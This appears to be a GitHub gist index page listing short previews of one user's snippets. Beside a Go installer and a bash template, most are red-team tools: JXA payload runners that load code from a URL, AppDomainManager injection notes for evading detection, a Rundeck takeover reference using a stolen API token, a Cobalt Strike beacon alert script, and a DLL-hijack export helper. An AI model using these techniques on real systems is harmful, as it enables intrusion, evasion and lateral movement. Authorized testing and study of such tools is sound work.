Skip to content

Instantly share code, notes, and snippets.

thesubtlety /
Created May 19, 2023 13:43 — forked from HackingLZ/
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore, Style, init
thesubtlety /
Created January 5, 2023 20:15
Install go to home dir on debian
# Install golang to home dir
LATEST="$(curl -s"
wget "$DL_URL" -P "$GOUTIL"
rm -rf "$GOPATH" && tar -C $HOME -xzf "$GOUTIL/$DL_PKG"
export PATH=$PATH:$HOME/go/bin
thesubtlety /
Created November 18, 2022 23:43
shell script template
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
set -o xtrace
thesubtlety / jxarun.swift
Last active September 10, 2023 19:25
Run jxa from file http stdin
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
// for hosted .js JXA payloads: ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads: ./JXARunner -f [path_to_jxa_payload]
// echo 'jxacode' | ./runner -s
thesubtlety / jxarunner.m
Created September 30, 2022 18:15
Obj JXA runner
#import <Foundation/Foundation.h>
#import <Appkit/AppKit.h>
#import <CoreFoundation/CoreFoundation.h>
#import <OSAKit/OSAKit.h>
#import <Cocoa/Cocoa.h>
#import <OSAKit/OSALanguage.h>
#import <Foundation/NSString.h>
#include <string.h>
//jxarunner file.js
thesubtlety /
Created April 25, 2022 14:53 — forked from djhohnstein/
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

thesubtlety /
Created October 14, 2021 15:06
Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.


# Identify projects
curl -H $TOKEN $RUNDECK/api/16/projects/ -H accept:application/json | jq  .
thesubtlety / stalebacon.cna
Created March 26, 2021 21:59
Stale beacon slacker, only messages once
# CNA script to alert on dead beacons. Doesn't repeat messages.
# author: noah @thesubtlety
# credit - bluescreenofjeff
$webhook_url = "";
$slack_channel = "#crackers";
%beacon_status = %();
# default stale value of 5 minutes (300000ms)
$stale_value = 300000;
thesubtlety /
Last active August 13, 2020 23:15
tl;dr natlas/docker install
thesubtlety / Get-Exports.ps1
Created February 12, 2020 17:59
DLL Hijack with exports
function Get-Exports {
Get-Exports, fetches DLL exports and optionally provides
C++ wrapper output (idential to ExportsToC++ but without
needing VS and a compiled binary). To do this it reads DLL
bytes into memory and then parses them (no LoadLibraryEx).
Because of this you can parse x32/x64 DLL's regardless of
the bitness of PowerShell.